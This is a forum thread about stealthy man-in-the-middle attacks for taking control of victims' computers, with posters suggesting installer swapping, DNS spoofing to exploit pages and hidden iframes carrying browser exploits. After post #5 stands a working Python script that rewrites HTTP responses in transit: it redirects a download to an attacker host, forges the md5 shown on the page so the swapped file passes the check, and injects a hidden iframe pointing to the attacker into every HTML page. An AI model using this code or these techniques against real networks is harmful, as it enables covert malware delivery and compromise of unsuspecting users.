
Thread: What is the least noisy MITM attack to take control of a box

#1 kazalku

    There are many tuts & videos explaining the famous man-in-the-middle attack. However, except for the sslstrip attack, all of them (I think) require the victim to download something and run an .exe (or other type of) file. This is a bit "noisy". Is there ANY way which causes less suspicion? Say, for example, if the victim tries to go to google.com, it will redirect to a fake (look-alike) google.com and then "somehow" automatically install a backdoor or connect back to a listening msf..... Well, you can ask: what do you mean by "somehow"? I don't know.. that's why I'm asking for help..
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

#2 Gitsnik

    Browsers tend to crap themselves if you try to actually install something. You might get away with a java applet installed but they are sandboxed really damned well so I doubt the avenue is applicable. Your best bet would be some sort of active evilgrade attack, but digital signatures can be a problem.

    In terms of MiTM itself, the quietest ways are actually sslstrip and having a valid root certificate installed. I usually deploy a root cert out to my XP machines in the domain so that I can ettercap them at will without getting the giant "OMG IZ BAD!" alerts, but what happens after that can be more problematic.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

#3 kazalku

    Quote originally posted by Gitsnik:
    In terms of MiTM itself, the quietest ways are actually sslstrip and having a valid root certificate installed.
    Thanks.. sslstrip is helpful but it doesn't help to get access to the data in the actual box.

#4 Gitsnik

    Quote originally posted by kazalku:
    Thanks.. sslstrip is helpful but it doesn't help to get access to the data in the actual box.
    No, neither really will; evilgrading is your best bet, but it's difficult to implement correctly. The problem really is that, even with abuse of trust in web browsers, there is really not much in the way of "download and run this .exe file" that goes on automatically (in a perfect browser world, I mean). You *may* get away with MiTM'ing a Citrix service (for example), but it is doubtful.

    It is not uncommon for me to manipulate pages on the fly and wait. If I expect my user to go after the latest nmap and I don't want him to have it, I manipulate the page he sees by modifying the md5 sum and redirecting his .exe installer to my local server - really though, this is just evilgrading anyway.

#5 Dooms_day

    Now, when doing ARP poison routing on a LAN, what steps do you go through to inject HTML into every page? It's been said in the middle of other topics but I can't seem to find it (seems on topic for this thread anyway).

    I think redirecting google to a mirror of google seems pretty silent, then use fast-track to do the mass browser exploitation of IE 7 (most 7331 browser eva).
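The on-the-fly page manipulation Gitsnik describes in #4 (rewrite the installer link and the md5 published next to it) and the injection Dooms_day asks about in #5 (put something into every HTML page that crosses the MITM) are the same operation underneath: edit an HTTP response body in transit and keep the headers consistent with what you changed. The block below is an added example written for this page, not code from the thread, from ettercap or from etterfilter. The page, the response and the "installer" bytes are constructed inline, and the attacker host 192.0.2.10 and the file name are placeholders. It also covers the two things a filter that only does a string replace on the wire bytes gets wrong, a chunked or gzip-compressed body and a stale Content-Length, and ends with the check that shows why an md5 printed on the same unauthenticated page gives the user no protection against this.

```python
# Edit an HTTP/1.x response body in transit. Added example, not thread code.
# Constructed data: the page, the "installer" bytes and the host 192.0.2.10
# are placeholders, not real artifacts.
import gzip
import hashlib
import re

CRLF = b"\r\n"
ATTACKER = b"http://192.0.2.10"                      # assumed MITM host
PAYLOAD = b"MZ-stand-in-for-the-attacker-installer"  # constructed, not a binary


def parse_response(raw):
    """Split a raw response into (status line, [(name, value)], body)."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def get_header(headers, name):
    for k, v in headers:
        if k.lower() == name.lower():
            return v
    return None


def dechunk(body):
    """Reassemble a Transfer-Encoding: chunked body (chunk sizes are hex)."""
    out = b""
    while True:
        size_line, _, rest = body.partition(CRLF)
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            return out
        out += rest[:size]
        body = rest[size + 2:]  # skip the chunk data and its trailing CRLF


def decode_body(headers, body):
    """Undo chunking and gzip; editing these bytes directly would corrupt them."""
    if (get_header(headers, b"Transfer-Encoding") or b"").lower() == b"chunked":
        body = dechunk(body)
    if (get_header(headers, b"Content-Encoding") or b"").lower() == b"gzip":
        body = gzip.decompress(body)
    return body


def rebuild(status, headers, body):
    """Re-emit as an identity-encoded body with a Content-Length that matches."""
    drop = (b"content-length", b"transfer-encoding", b"content-encoding")
    kept = [(k, v) for k, v in headers if k.lower() not in drop]
    kept.append((b"Content-Length", str(len(body)).encode()))
    return CRLF.join([status] + [k + b": " + v for k, v in kept]) + CRLF + CRLF + body


def swap_installer(html, orig_url, new_url, payload):
    """Post #4: point the download at our server and re-publish the md5 so the
    page still 'verifies' the file the victim actually receives."""
    new_md5 = hashlib.md5(payload).hexdigest().encode()
    html = html.replace(orig_url, new_url)
    return re.sub(rb"(?i)(md5\W*)([0-9a-f]{32})", lambda m: m.group(1) + new_md5, html)


def inject_tag(html, tag):
    """Post #5: add a tag to every HTML page, before </body> when there is one."""
    idx = html.lower().rfind(b"</body>")
    return html + tag if idx == -1 else html[:idx] + tag + html[idx:]


def rewrite_response(raw, transform):
    """Apply transform() to HTML responses only; pass everything else through."""
    status, headers, body = parse_response(raw)
    ctype = (get_header(headers, b"Content-Type") or b"").lower()
    if not ctype.startswith(b"text/html"):
        return raw
    return rebuild(status, headers, transform(decode_body(headers, body)))


def verify_download(html, payload):
    """What 'check the md5 on the page' amounts to for the victim: once the page
    is rewritten it accepts the attacker's file, because hash and file both
    arrive over the same unauthenticated channel."""
    m = re.search(rb"(?i)md5\W*([0-9a-f]{32})", html)
    return m is not None and m.group(1).lower() == hashlib.md5(payload).hexdigest().encode()


# Constructed download page, served gzip-compressed and chunked.
PAGE = (b"<html><body><h1>Downloads</h1>"
        b'<a href="http://example.invalid/nmap-setup.exe">nmap-setup.exe</a>'
        b"<p>md5: 0123456789abcdef0123456789abcdef</p></body></html>")
_gz = gzip.compress(PAGE)
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK" + CRLF + b"Content-Type: text/html; charset=utf-8" + CRLF
                   + b"Content-Encoding: gzip" + CRLF + b"Transfer-Encoding: chunked" + CRLF + CRLF
                   + b"%x" % len(_gz) + CRLF + _gz + CRLF + b"0" + CRLF + CRLF)


def demo():
    """Run both rewrites over the sample response and return the new wire bytes."""
    def transform(html):
        html = swap_installer(html, b"http://example.invalid/nmap-setup.exe",
                              ATTACKER + b"/nmap-setup.exe", PAYLOAD)
        return inject_tag(html, b'<iframe src="' + ATTACKER + b'/" width=0 height=0></iframe>')
    return rewrite_response(SAMPLE_RESPONSE, transform)


if __name__ == "__main__":
    print(demo().decode())
```

In practice this sits in a transparent proxy rather than a raw packet filter, and the usual shortcut is to strip Accept-Encoding from the client's request so the server never compresses in the first place. None of it touches an HTTPS response, which is why the thread keeps coming back to sslstrip and a trusted root certificate.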

#6 imported_vvpalin

    lol, please tell me you did not just put 1337 in your post ....

    But anyway, do a DNS spoofing attack on them and make a custom HTML page with both the IE7 and FF3.5 exploits embedded inside.

    You could even try using the filters and injecting it that way.. it might not get everyone if they stay on top of their updates, but it would probably get more people than you think.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

#7 operat0r

    You may want to look at the mass client-side script for fasttrack.py and also my methods using the smb_relay attack with etterfilter:
    Own Full patched XP box via HTTP - Remote Exploit Forums

#8 Dooms_day

    Aha, I used an iframe to clone the real page while the exploit sits in the background; even if they go to another page, it continues to load the exploit on the first page, cause iframes rock!

    Also better than a mirror, because scripts don't work (PHP).

#9 kazalku

    Quote originally posted by operat0r:
    may want to look at the mass client side script for fasttrack.py and also my methods using smb_relay attack with etterfilter
    Own Full patched XP box via HTTP - Remote Exploit Forums
    That doesn't work anymore, already tested.

    Quote originally posted by Dooms_day:
    aha i used an iframe to clone the real page while the exploit sits in the background, even if they goto another page, it continues to load the exploit on the first page, cause iframes rock!

    also better than a mirror because scripts dont work (php)
    Can you point to any tutorial please.
